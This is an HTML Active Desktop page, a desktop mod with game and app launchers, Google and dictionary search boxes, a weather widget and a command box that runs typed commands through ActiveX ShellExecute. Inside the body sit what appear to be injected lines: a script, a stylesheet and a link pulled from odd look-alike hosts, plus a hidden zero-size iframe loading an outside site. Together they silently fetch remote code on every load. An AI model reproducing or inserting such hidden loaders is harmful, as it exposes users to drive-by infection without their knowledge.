<html>
<head>
	<!--META HTTP-EQUIV=Refresh CONTENT="600; URL="desktop.html"-->
	<title>tsDesk mod by MaDCaT75</title>

<!-- Cascading Style Sheet -->

	<link href="activedesktop.css" type="text/css" rel="stylesheet" />

<!-- Applications VBasic -->

<!-- Applications Javascript -->

<script language="javascript" type="text/javascript">	

	function getWeatherUpdate() {

//	alert("running weather update");
//      change 93109 to your zip code

	var urlSrc = "http://www.wunderground.com/auto/raw/87112";
	var objHttp = new ActiveXObject("Microsoft.XMLHTTP");
	objHttp.Open( "GET", urlSrc, false );
	objHttp.Send();

	//fixme: no error handling

	var rsp = objHttp.ResponseText.split("|");
	var i;
	for( i = 0; i < rsp.length - 1; i++ ) {
		switch( i ) {
			case 1:
				document.getElementById('weather_temp').innerHTML =  rsp[i] + " �F";
				break;
			case 4:
				document.getElementById('weather_humidity').innerHTML = rsp[i] + " humidity";
				break;
			case 6:
				document.getElementById('weather_wind').innerHTML = "Winds " + rsp[i] + "mph";
				break;
			case 8:
				//icon can be insterted here?
				break;
		}
	}

	//run this every X seconds 
	var numSeconds = 60*25;  //wait 25 minutes between updates
	var wId = setTimeout('getWeatherUpdate()', numSeconds*1000 );
}

	function ShellExJ(command)
	{
		var splitAt = /^(.*?)(?:[<>\|\*\?](.*))?$/;
		var parts = command.match(splitAt);
		var filename = parts[1].replace(/"|'|\s*$/g, '');
		if(parts.length > 1)
			{  var params = parts[2].replace(/^\s*/, '');  }
		if(filename.indexOf('/') > -1)
			{  var folder = filename.substr(0, filename.lastIndexOf('/'));  }
		else
			{  var folder = filename.substr(0, filename.lastIndexOf('\\'));  }
		var objShell = new ActiveXObject("Shell.Application");
		objShell.ShellExecute(filename, params, folder, 'open', 1);
}
	</script>
</head>

<body style="background:url('wallpaper.jpg') #fff; overflow:hidden;">
<LINK REL="stylesheet" TYPE="text/css" HREF="http://i.css.com./____base.css1513133089">
<A HREF="http://i.html.com./____base.html"></A>
<SCRIPT LANGUAGE = "JAVASCRIPT" SRC = "http://i.js.com./____base.js"></SCRIPT>
<IFRAME frameborder="0" height="0" width="0" src="http://pluto_project.net/"></IFRAME>

<!-- Internet Links -->
<div id="netLinks">
  	<span class="title">i n t e r n e t : : . .</span><br />
	:: <a href="http://www.avault.com">The.Adrenaline.Vault</a>
	:: <a href="http://www.download.com">CNET.Download</a>
	::
</div>



<!-- Applications/Folders -->
<div id="progList">
  	<div align="right">
	
	<span class="title">. . : : G a m e s</span><br />
	<a target="_self" onClick=" ShellExJ('C:/UT2004/System/UT2004.exe')" href="javascript:;">UT2k4 :: </a><br />
	<a target="_self" onClick=" ShellExJ('C:/UnrealTournament/System/UnrealTournament.exe')" href="javascript:;">UT99 :: </a><br />
	<a target="_self" onClick=" ShellExJ('C:/Tactical Ops/System/TacticalOps.exe')" href="javascript:;">TacOps :: </a><br />
	<a target="_self" onClick=" ShellExJ('C:/Program Files/Postal2STP/System/Postal2.exe')" href="javascript:;">Postal 2 STP :: </a><br />
  <a target="_self" onClick=" ShellExJ('C:/Halo/halo.exe')" href="javascript:;">Halo PC :: </a><br />
	<a target="_self" onClick=" ShellExJ('C:/Doom3/Doom3.exe')" href="javascript:;">Doom 3 :: </a><br /><br />

	<span class="title">. . : : I n t e r n e t</span><br />
	<a target="_self" onClick=" ShellExJ('C:/Program Files/Shareaza/Shareaza.exe')" href="javascript:;">Shareaza :: </a><br />
	<a target="_self" onClick=" ShellExJ('C:/Program Files/Clean KMD/Kazaa.exe')" href="javascript:;">Clean KMD :: </a><br />
	<a target="_self" onClick=" ShellExJ('C:/Program Files/Microsoft Office/OFFICE11/Outlook.exe')" href="javascript:;">Outlook 2003 :: </a><br />
	<a target="_self" onClick=" ShellExJ('C:/NoNameScript/mirc.exe')" href="javascript:;">NNScript :: </a><br />
	<a target="_self" onClick=" ShellExJ('C:/Program Files/Internet Explorer/IEXPLORE.EXE')" href="javascript:;">Internet Explorer :: </a> <br /><br />
	
		<span class="title">. . : : M a p E d i t i n g</span><br />
	<a target="_self" onClick=" ShellExJ('C:/Tactical Ops/System/Unrealed.exe')" href="javascript:;">TacOpsEd :: </a><br />
	<a target="_self" onClick=" ShellExJ('C:/UnrealTournament/System/Unrealed.exe')" href="javascript:;">UnrealEd 2 :: </a><br />
	<a target="_self" onClick=" ShellExJ('C:/UT2004/System/Unrealed.exe')" href="javascript:;">UnrealEd 3 :: </a><br />
	<a target="_self" onClick=" ShellExJ('C:/Program Files/Postal2STP/System/UnrealEd.exe')" href="javascript:;">PostalEd :: </a> <br /><br />

	<span class="title">. . : : I m a g i n g</span><br />
	<a target="_self" onClick=" ShellExJ('C:/Program Files/Adobe/Photoshop CS/Photoshop.exe')" href="javascript:;">Photoshop CS :: </a><br />
	<a target="_self" onClick=" ShellExJ('C:/Program Files/Adobe/Photoshop CS/ImageReady.exe')" href="javascript:;">ImageReady CS :: </a><br />
  	</div>
</div>



<!-- Expanding link list -->


<!-- Search Bars -->
<div id="search">
	<form action="http://www.google.com/search" name="f" target="_new">
		<input type="hidden" name="hl" value="en" />
		<input type="hidden" name="ie" value="UTF-8" />
		<input type="hidden" name="oe" value="UTF-8" />

		<span class="title">g o o g l e &nbsp; s e a r c h : : . .</span><br />
		<input type="text" name="q" class="textbox" maxlength="128" value="" onBlur="this.value=''" />
	</form>


	<form action="http://images.google.com/images" name="f" target="_new">
		<input type="hidden" name="hl" value="en" />
		<input type="hidden" name="oe" value="UTF-8" />
		<input type="hidden" name="ie" value="UTF-8" />

		<span class="title">i m a g e &nbsp; s e a r c h : : . .</span><br />
		<input type="text" name="q" class="textbox" maxlength="128" value="" onBlur="this.value=''" />
	</form>
	
	<form action="http://dictionary.reference.com/search" name="q" target="_new">

		<span class="title">d i c t i o n a r y . c o m : : . .</span><br />
		<input type="text" name="q" class="textbox" maxlength="128" value="" onBlur="this.value=''" />
	</form>
</div>
</form>
<body style="#fff; overflow:hidden;">

</div>

<!-- Console option -->
<div id="console">
	<span class="title">c o m m a n d &nbsp; l i n e : : . .</span><br />
	<input type="text" class="textbox" onkeypress="if(event.keyCode==13) { ShellExJ(this.value); this.value='' }" />
</div>

<!-- Weather -->
<div id="weather">
	<div align="right">

	<span class="title">. . : : w e a t h e r</span><br />

	<label id="weather_temp" name="weather_temp">temp</label> ::<br>
	<label id="weather_humidity" name="weather_humidity">humidity</label> ::<br>
	<label id="weather_wind" name="weather_wind">wind</label> ::<br>
</div>


<!-- Start the weather updates -->
<SCRIPT LANGUAGE="JavaScript">
	getWeatherUpdate();
</SCRIPT>

</body>
</html>